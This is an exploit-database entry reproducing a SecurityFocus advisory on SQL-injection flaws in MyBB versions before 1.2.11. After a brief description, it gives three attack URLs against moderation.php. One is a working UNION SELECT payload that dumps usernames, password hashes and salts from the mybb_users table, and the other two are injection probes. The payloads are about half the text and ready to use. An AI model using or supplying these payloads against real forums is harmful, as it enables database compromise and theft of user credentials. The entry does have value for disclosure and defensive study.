11 lines
No EOL
901 B
Text
Executable file
11 lines
No EOL
901 B
Text
Executable file
source: http://www.securityfocus.com/bid/27323/info
|
|
|
|
MyBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
Versions prior to MyBB 1.2.11 are vulnerable.
|
|
|
|
http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts&mergepost[-1]=1&mergepost[-2)UNION+ALL+SELECT+1,2,3,4,1,6,7+UNION+ALL+SELECT+1,(SELECT+CONCAT(0x5e,username,0x5e,password,0x5e,salt,0x5e,0x27)+FROM+mybb_users+LIMIT+0,1),3,4,1,6,7/*]=2
|
|
http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=allreports&rid=0'+UNION+SELECT+waraxe--+
|
|
http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_multimovethreads&moveto=2&threads=war|axe |